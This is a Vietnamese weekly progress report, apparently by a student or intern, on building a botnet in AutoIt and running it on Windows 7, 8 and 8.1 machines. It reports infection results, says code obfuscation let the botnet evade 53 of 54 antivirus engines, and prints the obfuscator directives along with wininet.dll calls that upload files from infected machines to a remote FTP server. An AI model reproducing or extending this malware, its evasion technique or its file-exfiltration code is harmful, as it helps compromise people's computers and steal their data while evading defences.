1. BÁO CÁO TUẦN 1
Trong tuần rồi em đã thực hiện triển khai mạng botnet bằng ngôn ngữ Autoit trên
các máy tính chạy windows 7 (tất cả các phiên bản) , windows 8 , windows 8.1 .
Kết quả :
- Đối với windows 7 và 8 : botnet chạy ổn định , nhưng vớicác máy bị lây
nhiễm mà user (của máy bị nhiễm) không có quyền ghi file (copy , write … )
trên ổ C: thì botnet không có tác dụng
- Đối với windows 8.1 : botnet không có khả năng chạy ổn định
Em đã dùng các hàm sẵn có của Autoit để làm rối code , kết quả sau khi làm rối thì
đã bypass 53/54 trình AntiVirus , còn 1 trình AntiVirus chưa bypass được là CMC
của Việt Nam . Đoạn code làm rốiđược đặt ở đầu và cuối của phần code của
botnet :
#AutoIt3Wrapper_Run_Obfuscator =y
#Obfuscator_Ignore_Variables =
#Obfuscator_Ignore_Funcs =
#Obfuscator_On
[phần code của botnet]
#Obfuscator_Off
Riêng phần code upload file em xây dựng như sau :
-Load thư viện wininet.dll để mở dịch vụ FTP
DllCall('wininet.dll', 'long', 'InternetOpen', 'str', $s_Agent, 'long',
$l_AccessType, 'str', $s_ProxyName, 'str', $s_ProxyBypass, 'long', $l_Flags)
-Cũng load thư viện wininet.dll để kết nối vào FTP
2. DllCall('wininet.dll', 'long', 'InternetConnect', 'long', $l_InternetSession, 'str',
$s_ServerName, 'int', $i_ServerPort, 'str', $s_Username, 'str', $s_Password,
'long', $l_Service, 'long', $l_Flags, 'long', $l_Context)
-Tiếp theo là upload file lên FTP
DllCall('wininet.dll', 'int', 'FtpPutFile', 'long', $l_FTPSession, 'str',
$s_LocalFile, 'str', $s_RemoteFile, 'long', $l_Flags, 'long', $l_Context)
-Và cuối cùng là đóng FTP lại
DllCall('wininet.dll', 'int', 'InternetCloseHandle', 'long', $l_InternetSession)